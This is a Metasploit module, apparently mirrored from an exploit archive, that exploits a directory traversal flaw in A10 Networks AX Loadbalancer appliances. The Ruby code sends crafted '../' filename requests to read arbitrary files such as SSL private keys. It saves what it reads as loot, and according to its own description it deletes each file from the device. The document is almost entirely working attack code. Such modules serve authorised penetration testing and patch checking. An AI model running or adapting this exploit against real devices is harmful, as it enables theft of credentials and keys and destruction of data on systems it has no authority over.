## https://sploitus.com/exploit?id=PACKETSTORM:181208
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'A10 Networks AX Loadbalancer Directory Traversal',
'Description' => %q{
This module exploits a directory traversal flaw found in A10 Networks
(Soft) AX Loadbalancer version 2.6.1-GR1-P5/2.7.0 or less. When
handling a file download request, the xml/downloads class fails to
properly check the 'filename' parameter, which can be abused to read
any file outside the virtual directory. Important files include SSL
certificates. This module works on both the hardware devices and the
Virtual Machine appliances. IMPORTANT NOTE: This module will also delete the
file on the device after downloading it. Because of this, the CONFIRM_DELETE
option must be set to 'true' either manually or by script.
},
'References' =>
[
['OSVDB', '102657'],
['BID', '65206'],
['EDB', '31261']
],
'Author' =>
[
'xistence' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2014-01-28'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/a10data/key/mydomain.tld']),
OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]),
OptBool.new('CONFIRM_DELETE', [true, 'Run the module, even when it will delete files', false]),
])
end
def run
unless datastore['CONFIRM_DELETE']
print_error("This module will delete files on vulnerable systems. Please, set CONFIRM_DELETE in order to run it.")
return
end
super
end
def run_host(ip)
peer = "#{ip}:#{rport}"
fname = datastore['FILE']
print_status("Reading '#{datastore['FILE']}'")
traverse = "../" * datastore['DEPTH']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "xml", "downloads", ""),
'vars_get' =>
{
'filename' => "/a10data/tmp/#{traverse}#{datastore['FILE']}"
}
})
if res and res.code == 500 and res.body =~ /Error report/
vprint_error("Cannot obtain '#{fname}', here are some possible reasons:")
vprint_error("\t1. File does not exist.")
vprint_error("\t2. The server does not have any patches deployed.")
vprint_error("\t3. Your 'DEPTH' option isn't deep enough.")
vprint_error("\t4. Some kind of permission issues.")
elsif res and res.code == 200
data = res.body
p = store_loot(
'a10networks.ax',
'application/octet-stream',
ip,
data,
fname
)
vprint_line(data)
print_good("#{fname} stored as '#{p}'")
elsif res and res.code == 404 and res.body.to_s =~ /The requested URL.*was not found/
vprint_error("File not found. Check FILE.")
else
vprint_error("Fail to obtain file for some unknown reason")
end
end
end